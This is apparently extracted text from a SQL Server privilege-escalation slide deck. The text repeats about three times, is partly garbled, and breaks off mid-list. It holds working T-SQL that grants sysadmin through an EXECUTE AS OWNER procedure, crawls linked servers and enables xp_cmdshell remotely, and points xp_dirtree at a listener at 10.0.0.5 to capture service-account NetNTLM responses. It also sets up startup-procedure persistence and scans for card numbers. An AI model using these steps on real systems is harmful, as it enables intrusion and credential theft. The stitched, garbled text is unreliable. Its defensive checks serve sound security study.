>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ, Intranet; hosts shown are LVA and HVA application/database servers and ADS; ports 80 and 443 from the Internet into the DMZ, ports 1433 and 1434 to the database servers. Attack path: (1) SQL injection against the LVA; (2) execute a local command via xp_cmdshell; (3) access the HVA with the shared domain service account and execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
What's a database link?
• Database links (linked servers) are basically persistent database connections between SQL Servers
Why should I care?
• Short answer = privilege escalation
• The PUBLIC role can use links to execute queries on remote servers in whatever security context the link was configured with (impersonation)
  SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@VERSION')
• Stored procedures can be executed through the link (xp_cmdshell)
• Links can be crawled from server to server
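Crawling a chain of links by hand, as an added example (not from the original deck; PowerUpSQL's Get-SQLServerLinkCrawl automates the same walk). Assumed link names: SQLSERVER2 defined on this server, and SQLSERVER3 defined on SQLSERVER2. The quoting rule is the part people get wrong: every hop doubles the single quotes once more.

```sql
-- Added example (not from the original deck): enumerating and crawling linked
-- servers by hand. Assumed link names: SQLSERVER2 (defined here) and
-- SQLSERVER3 (defined on SQLSERVER2).

-- 1. What links exist here, and does each one allow remote procedure calls?
SELECT name, product, provider, data_source, is_rpc_out_enabled
FROM sys.servers
WHERE is_linked = 1;

-- The login mapping tells you whose rights you get on the far side. A mapping
-- for every login (local_login NULL) with remote_name 'sa' is the diagram's
-- "DB Link with SA account"; uses_self_credential = 1 passes your own identity.
SELECT s.name AS link, ll.uses_self_credential, ll.remote_name,
       sp.name AS local_login
FROM sys.linked_logins AS ll
JOIN sys.servers AS s ON s.server_id = ll.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 2. Who am I on the remote side? Any login, PUBLIC included, can run this.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT @@SERVERNAME AS srv, SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sa');

-- 3. One hop further. The inner OPENQUERY text is a string inside a string, so
--    its quotes are doubled twice.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT * FROM OPENQUERY([SQLSERVER3],
     ''SELECT @@SERVERNAME AS srv, SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''''sysadmin'''') AS is_sa'')');

-- 4. If the link lands as sysadmin and RPC Out is enabled, configuration
--    changes and xp_cmdshell run on the remote server through the link.
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQLSERVER2];
EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQLSERVER2];
EXEC ('EXEC master.sys.xp_cmdshell ''whoami'';') AT [SQLSERVER2];
```

OPENQUERY needs no special link setting and is enough for the crawl; EXEC ... AT is the step that depends on is_rpc_out_enabled, which is why the first query reports it.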
[Diagram: Leveraging MS SQL Database Links. Same network layout as above (Internet, DMZ, Intranet; LVA, HVA and ADS; ports 80 and 443, 1433 and 1434). DB1 is the LVA database server; from it a chain of links leads toward the HVA, one link configured with least privileges and the next with the SA account. Attack path: (1) SQL injection against the LVA; (2) execute SQL queries and local commands on the database servers via nested linked servers. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of the environments we've seen
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM challenge-response (the "password hash") and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah...
• By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree and xp_fileexist
Escalating Privileges: UNC Path Injection
So in summary...
• The PUBLIC role can obtain the SQL Server service account's NetNTLM challenge-response by default
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
• Oh yeah, a ton of domain users
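The xp_dirtree trick from the slides above, with the check and the fix a defender would want, as an added example (not from the original deck; Get-SQLServiceAccountPwHashes wraps the same call). It assumes an SMB capture listener such as Inveigh or Responder at 10.0.0.5, and sysadmin rights for the REVOKE at the end.

```sql
-- Added example (not from the original deck): forcing the service account to
-- authenticate to a UNC path, and the checks and fix for defenders.
-- Assumed: an SMB capture listener (Inveigh, Responder) at 10.0.0.5.
USE master;
GO
-- Any login can run these by default, because public holds EXECUTE on them.
-- Nothing needs to exist at the path: the engine, running as the service
-- account, connects to \\10.0.0.5 over SMB and sends its NetNTLM response,
-- which the listener records for cracking or relay.
EXEC sys.xp_dirtree   '\\10.0.0.5\share', 1, 1;
EXEC sys.xp_fileexist '\\10.0.0.5\share\x.txt';
GO
-- Check, from any low-privileged login: does this instance still allow it?
SELECT HAS_PERMS_BY_NAME('master.sys.xp_dirtree',   'OBJECT', 'EXECUTE') AS can_dirtree,
       HAS_PERMS_BY_NAME('master.sys.xp_fileexist', 'OBJECT', 'EXECUTE') AS can_fileexist;
GO
-- Where the grant comes from: the default EXECUTE grants to public in master.
SELECT OBJECT_NAME(major_id) AS xproc, USER_NAME(grantee_principal_id) AS grantee,
       permission_name, state_desc
FROM sys.database_permissions
WHERE major_id IN (OBJECT_ID('sys.xp_dirtree'), OBJECT_ID('sys.xp_fileexist'));
GO
-- Fix (sysadmin): remove the default grant. Sysadmins keep the ability, and an
-- application that genuinely needs it gets an explicit GRANT instead.
REVOKE EXECUTE ON sys.xp_dirtree   FROM public;
REVOKE EXECUTE ON sys.xp_fileexist FROM public;
```

Re-run the HAS_PERMS_BY_NAME query as an ordinary domain login after the REVOKE: both columns should drop from 1 to 0. The revoke closes the default path only; any other procedure or SQL Agent step that accepts an attacker-controlled file path still needs the same scrutiny.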
Escalating Privileges: UNC Path Injection - DEMO
Get-SQLServiceAccountPwHashes
...what? It's self-descriptive.
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach                                                      Common Tools
Access as Local Administrator                                 Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                         Psexec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets  Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process   Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process    Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                              DBATools
Common Post Exploitation Activities
Post Exploitation Overview
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry and file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy the database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (no exfil in PowerUpSQL yet)
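Two of the activities above in working T-SQL, as an added example (not from the original deck or PowerUpSQL): the startup-procedure persistence from item 1 with the query that finds it, and the keyword-plus-Luhn hunt for card numbers from item 2. The marker procedure, the fn_luhn_ok function, the database MyAppDb and the customer_payment table with its three constructed rows are all assumptions made for the example.

```sql
-- Added example (not from the original deck or PowerUpSQL). Part (a): startup
-- procedure persistence and how to find it. Part (b): keyword search plus a
-- Luhn check over sampled values. Names and sample rows are constructed.
USE master;
GO
-- (a) A sysadmin marks a procedure in master to run at every service start.
--     This one only writes a row; an attacker's version would re-add a login to
--     sysadmin or re-enable xp_cmdshell in exactly the same way.
CREATE TABLE dbo.startup_log (ran_at datetime2 NOT NULL DEFAULT SYSDATETIME());
GO
CREATE PROCEDURE dbo.usp_startup_marker AS INSERT dbo.startup_log DEFAULT VALUES;
GO
EXEC sp_procoption @ProcName = 'dbo.usp_startup_marker', @OptionName = 'startup', @OptionValue = 'on';
GO
-- Defender's check: every auto-executed procedure should be explainable.
SELECT name, create_date, modify_date
FROM master.sys.procedures
WHERE is_auto_executed = 1;
-- Undo: EXEC sp_procoption 'dbo.usp_startup_marker', 'startup', 'off';
GO
USE MyAppDb;   -- assumed application database
GO
-- (b) Luhn check: strips spaces and dashes, rejects implausible lengths, then
--     doubles every second digit from the right and tests the sum modulo 10.
CREATE FUNCTION dbo.fn_luhn_ok (@digits varchar(32)) RETURNS bit
AS
BEGIN
    DECLARE @d varchar(32) = '', @i int = 1;
    WHILE @i <= LEN(@digits)
    BEGIN
        IF SUBSTRING(@digits, @i, 1) LIKE '[0-9]' SET @d += SUBSTRING(@digits, @i, 1);
        SET @i += 1;
    END;
    IF LEN(@d) < 13 OR LEN(@d) > 19 RETURN 0;
    DECLARE @sum int = 0, @pos int = LEN(@d), @dbl bit = 0, @n int;
    WHILE @pos >= 1
    BEGIN
        SET @n = CAST(SUBSTRING(@d, @pos, 1) AS int);
        IF @dbl = 1 SET @n = CASE WHEN @n * 2 > 9 THEN @n * 2 - 9 ELSE @n * 2 END;
        SET @sum += @n;
        SET @dbl = 1 - @dbl;
        SET @pos -= 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO
-- Constructed sample data: a valid test PAN, a typo, and an all-zero dummy.
CREATE TABLE dbo.customer_payment (id int, card_number varchar(32));
INSERT dbo.customer_payment VALUES
  (1, '4111 1111 1111 1111'),   -- passes Luhn
  (2, '4111-1111-1111-1112'),   -- fails Luhn (last digit wrong)
  (3, '0000000000000000');      -- passes Luhn; obvious dummy, still worth a look
GO
-- Keyword pass: columns whose names suggest card data, across the database.
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE COLUMN_NAME LIKE '%card%' OR COLUMN_NAME LIKE '%pan%' OR COLUMN_NAME LIKE '%ccn%';
-- Sample pass: how many of the first rows of a candidate column pass Luhn.
-- A column named card_number full of test junk scores 0 and drops down the list.
SELECT COUNT(*) AS sampled,
       SUM(CAST(dbo.fn_luhn_ok(card_number) AS int)) AS luhn_valid
FROM (SELECT TOP (100) card_number FROM dbo.customer_payment) AS s;   -- 3, 2
```

The Luhn pass is a filter, not proof: it confirms that a column is worth opening, which is the point of sampling before pulling whole tables across the wire.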
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user's context
